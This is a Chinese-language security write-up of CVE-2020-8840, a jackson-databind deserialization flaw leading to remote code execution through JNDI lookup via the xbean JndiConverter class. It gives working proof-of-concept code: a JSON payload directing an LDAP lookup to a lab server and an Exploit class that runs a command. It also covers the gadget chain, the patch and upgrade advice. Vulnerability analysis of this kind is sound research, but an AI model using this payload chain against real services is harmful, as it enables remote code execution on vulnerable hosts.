CVE-2020-8840:Jackson-databind RCE

影响范围

jackson-databind before 2.9.10.3
jackson-databind before 2.8.11.5
jackson-databind before 2.7.9.7

漏洞类型

JDNI注入导致RCE

利用条件

开启enableDefaultTyping()
使用了org.apache.xbean.propertyeditor.JndiConverter第三方依赖

漏洞概述

2020年2月，jackson-databind在github上更新了一个新的反序列化利用类org.apache.xbean.propertyeditor.JndiConverter，该类绕过了之前jackson-databind维护的黑名单类，并且JDK版本较低的话，可造成RCE。

漏洞复现

环境搭建

pom.xml如下：

 <dependencies><dependency><groupId>com.fasterxml.jackson.core</groupId><artifactId>jackson-databind</artifactId><version>2.9.9.1</version></dependency><!-- https://mvnrepository.com/artifact/org.apache.xbean/xbean-reflect --><dependency><groupId>org.apache.xbean</groupId><artifactId>xbean-reflect</artifactId><version>4.17</version></dependency><dependency><groupId>org.slf4j</groupId><artifactId>slf4j-nop</artifactId><version>1.7.2</version></dependency><!-- https://mvnrepository.com/artifact/javax.transaction/jta --><dependency><groupId>javax.transaction</groupId><artifactId>jta</artifactId><version>1.1</version></dependency></dependencies>

漏洞利用

这里使用LDAP的利用方式进行漏洞的利用演示，RMI的方式也是类似的，且RMI比LDAP要对JDK版本有很大的局限性~

LDAP利用方式：jdk版本：JDK 11.0.1、8u191、7u201、6u211之前，笔者这里采用JDK 1.8.0_181

编译Exploit.java

Exploit.java代码如下：

import java.lang.Runtime;public class Exploit {static {try {Runtime.getRuntime().exec("calc");} catch (Exception e) {e.printStackTrace();}}
}

编译Exploit.java文件：

搭建HTTP服务

使用Python搭建简易SimpleHTTPServer服务：

python -m  SimpleHTTPServer 4444

搭建LDAP服务

使用marshalsec来启动一个LDAP服务：

执行漏洞POC1

Poc.java代码如下所示：

package com.jacksonTest;import com.fasterxml.jackson.databind.ObjectMapper;
import java.io.IOException;public class Poc {public static void main(String[] args) throws Exception {ObjectMapper mapper = new ObjectMapper();mapper.enableDefaultTyping();String payload = "[\"org.apache.xbean.propertyeditor.JndiConverter\", {\"asText\":\"ldap://127.0.0.1:1099/Exploit\"}]";try {Object obj = mapper.readValue(payload, Object.class);} catch (IOException e) {e.printStackTrace();}}
}

之后运行该程序，成功执行命令，弹出计算器：

漏洞分析

首先定位到org.apache.xbean.propertyeditor.JndiConverter类，发现在该类较为简单，且构造函数直接调用父类的构造方法，不过在该类中却调用了lookup对text进行查询，这一点需要留意，看后续是否有与toObjectImpl函数的相关调用点，之后跟进父类AbstractConvert：

在父类中搜索toObjectImpl发现在toObject中有调用，且参数为当前类的text:

之后继续查看toObject的调用，发现在setAsText处调用，且传递的参数为text可控：

综上所述，我们可以指定反序列化类为org.apache.xbean.propertyeditor.JndiConverter，之后指定set方法为asText，之后传递参数为ldap服务地址，之后在setAsText中调用toObject函数，之后在toObject中调用toObjectImp，之后在toObjectImp中执行lookup，从而导致JNDI，最终RCE~

整个利用链如下所示：

mapper.readValue->AbstractConverter.setAsText->AbstractConverter.toObject->JndiConverter.toObjectImpl->lookup

补丁分析

官方在github的更新方式依旧是添加相关类到黑名单，但这种方式治标不治本，后续可能出现其他绕过黑名单的gdaget:

https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497

修复建议

及时将jackson-databind升级到安全版本
升级到较高版本的JDK。

参考链接

https://github.com/FasterXML/jackson-databind/issues/2620

https://github.com/FasterXML/jackson-databind/commit/914e7c9f2cb8ce66724bf26a72adc7e958992497